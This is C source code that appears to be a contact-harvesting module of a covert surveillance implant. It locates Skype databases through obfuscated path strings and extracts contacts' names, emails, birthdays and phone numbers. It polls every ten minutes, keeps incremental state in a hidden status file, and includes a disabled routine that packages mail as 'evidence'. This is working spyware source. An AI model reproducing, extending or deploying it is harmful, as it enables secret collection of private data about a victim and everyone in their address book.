#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <openssl/bio.h>
#include <openssl/md5.h>
#include <sqlite3.h>
#include <linux/limits.h>
#include <glob.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"
#include "so.h"

#define ENTRY_LOCAL  0x01
#define ENTRY_REMOTE 0x02

#define PROGRAM_SKYPE 0x02

static int skype_getaddressbook(void);
static int skype_getcontacts(char *maindb);
static int skype_sqlcallback(void *arg, int num, char **val, char **key);

struct entry {
   int program;
   int type;
   char *username;
   char *displayname;
   char *email;
   char *birthday;
   char *phonehome;
   char *phoneoffice;
   char *phonemobile;
   struct entry *next;
};

static struct entry *list = NULL, *listp = NULL;

void *module_addressbook_start(void *args)
{
   int i;

   debugme("Running module ADDRESSBOOK\n");

   do {
      while(MODULE_ADDRESSBOOK.status != MODULE_STOPPING) {
         if(MODULE_ADDRESSBOOK.status == MODULE_STARTING) MODULE_ADDRESSBOOK.status = MODULE_STARTED;

         skype_getaddressbook();

         debugme("- Addressbook dump begin\n");
         for(listp = list; listp; listp = listp->next) debugme("--- %s\n", listp->displayname);
         debugme("- Addressbook dump end\n");

         /* TODO creare il log */

         for(listp = list; listp;) {
            list = listp;
            listp = listp->next;
            if(list->username) free(list->username);
            if(list->displayname) free(list->displayname);
            if(list->email) free(list->email);
            if(list->birthday) free(list->birthday);
            if(list->phonehome) free(list->phonehome);
            if(list->phoneoffice) free(list->phoneoffice);
            if(list->phonemobile) free(list->phonemobile);
            free(list);
         }
         list = NULL;

         for(i = 600; i && (MODULE_ADDRESSBOOK.status != MODULE_STOPPING); i--) sleep(1);
      }
   } while(0);

   MODULE_ADDRESSBOOK.status = MODULE_STOPPED;

   return NULL;
}

static int skype_getaddressbook(void)
{
   char file[PATH_MAX];
   glob_t maindb;
   int i;

   do {
      if(snprintf(file, sizeof(file), so110, getenv(so111)) >= sizeof(file)) break;
      if(glob(file, GLOB_NOSORT, NULL, &maindb)) break;
      for(i = 0; i < maindb.gl_pathc; i++) skype_getcontacts(maindb.gl_pathv[i]);
   } while(0);
   globfree(&maindb);

   return 0;
}

static int skype_getcontacts(char *maindb)
{
   FILE *fp = NULL;
   char line[4096];
   unsigned char md5[MD5_DIGEST_LENGTH];
   char statusfile[2 + (MD5_DIGEST_LENGTH * 2) + 1];
   char query[256];
   int lastid1 = 0, lastid2 = 0;
   sqlite3 *db = NULL;

   do {
      debugme("Database: %s\n", maindb);

      MD5((unsigned char *)maindb, strlen(maindb), md5);

      snprintf(statusfile, sizeof(statusfile), so112,
                                                  md5[0], md5[1], md5[2], md5[3], md5[4], md5[5], md5[6], md5[7], md5[8], md5[9],
                                                  md5[10], md5[11], md5[12], md5[13], md5[14], md5[15], md5[16], md5[17], md5[18], md5[19]);

      do {
         if(!(fp = fopen(statusfile, "r"))) break;
         if(!fgets(line, sizeof(line), fp)) break;
         lastid1 = atoi(line);
         if(!fgets(line, sizeof(line), fp)) break;
         lastid2 = atoi(line);
      } while(0);
      if(fp) fclose(fp);

      if(sqlite3_open(maindb, &db) != SQLITE_OK) break;

      if(snprintf(query, sizeof(query), so113, lastid1) >= sizeof(query)) break;
      if(sqlite3_exec(db, query, skype_sqlcallback, (void *)&lastid1, NULL) != SQLITE_OK) break;

      if(snprintf(query, sizeof(query), so114, lastid2) >= sizeof(query)) break;
      if(sqlite3_exec(db, query, skype_sqlcallback, (void *)&lastid2, NULL) != SQLITE_OK) break;
   } while(0);
   if(db) sqlite3_close(db);

   do {
      if(!(fp = fopen(statusfile, "w"))) break;
      fprintf(fp, "%u\n%u\n", lastid1, lastid2);
   } while(0);
   if(fp) fclose(fp);

   return 0;
}

static int skype_sqlcallback(void *arg, int num, char **val, char **key)
{
   do {
      *((int *)arg) = atoi(val[0]);         

      if(!list) {
         if(!(list = malloc(sizeof(struct entry)))) break;
         listp = list;
      } else {
         if(!(listp->next = malloc(sizeof(struct entry)))) break;
         listp = listp->next;
      }
      memset(listp, 0, sizeof(struct entry));

      if(num == 3) {
         listp->program = PROGRAM_SKYPE;
         listp->type = ENTRY_LOCAL;
         if(val[1]) listp->username = strdup(val[1]);
         if(val[2]) listp->displayname = strdup(val[2]);
      } else if(num == 8) {
         listp->program = PROGRAM_SKYPE;
         listp->type = ENTRY_REMOTE;
         if(val[1]) listp->username = strdup(val[1]);
         if(val[2]) listp->displayname = strdup(val[2]);
         if(val[3]) listp->email = strdup(val[3]);
         if(val[4] && (strlen(val[4]) == 8)) asprintf(&listp->birthday, "%c%c/%c%c/%c%c%c%c", val[4][6], val[4][7], val[4][4], val[4][5], val[4][0], val[4][1], val[4][2], val[4][3]);
         if(val[5]) listp->phonehome = strdup(val[5]);
         if(val[6]) listp->phoneoffice = strdup(val[6]);
         if(val[7]) listp->phonemobile = strdup(val[7]);
      }
   } while(0);

   return 0;
}


#if 0
static int getmail(BIO *bio_data, int foldertype, int program)
{
   BIO *bio_additional = NULL;
   int additionallen, datalen;
   char *additionalptr, *dataptr;
   struct additional a;

   do {
      if(!(bio_additional = BIO_new(BIO_s_mem()))) break;

      if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) break;

      a.version = 2012030601;
      a.flags = foldertype;
      a.size = datalen;
      a.ltime = 0;
      a.htime = 0;
      a.program = program;

      if(BIO_write(bio_additional, &a, sizeof(a)) != sizeof(a)) break;

      BIO_flush(bio_additional);
      BIO_flush(bio_data);

      additionallen = BIO_get_mem_data(bio_additional, &additionalptr);
      datalen = BIO_get_mem_data(bio_data, &dataptr);

      evidence_write(EVIDENCE_TYPE_MAIL, additionalptr, additionallen, dataptr, datalen);
   } while(0);
   if(bio_additional) BIO_free(bio_additional);

   return 0;
}
#endif
